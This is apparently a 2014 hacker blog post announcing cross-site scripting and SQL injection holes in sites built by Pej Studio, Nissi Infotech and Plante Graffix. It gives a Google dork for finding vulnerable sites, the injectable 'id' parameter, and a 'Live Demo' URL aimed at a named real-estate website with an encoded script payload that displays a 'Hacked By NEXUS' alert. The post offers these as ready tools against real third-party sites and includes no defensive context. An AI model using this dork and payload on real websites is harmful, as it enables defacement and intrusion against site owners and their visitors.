Saturday, 5 July 2014

Pej Studio & Nissi Infotech & Plante Graffix - Cross Site Scripting (XSS)

Dork:
intext:"Created By Nissi Infotech"

Exploits:
http://target.com/name.php?id= [XSS & SQLI]

Live Demo:
http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring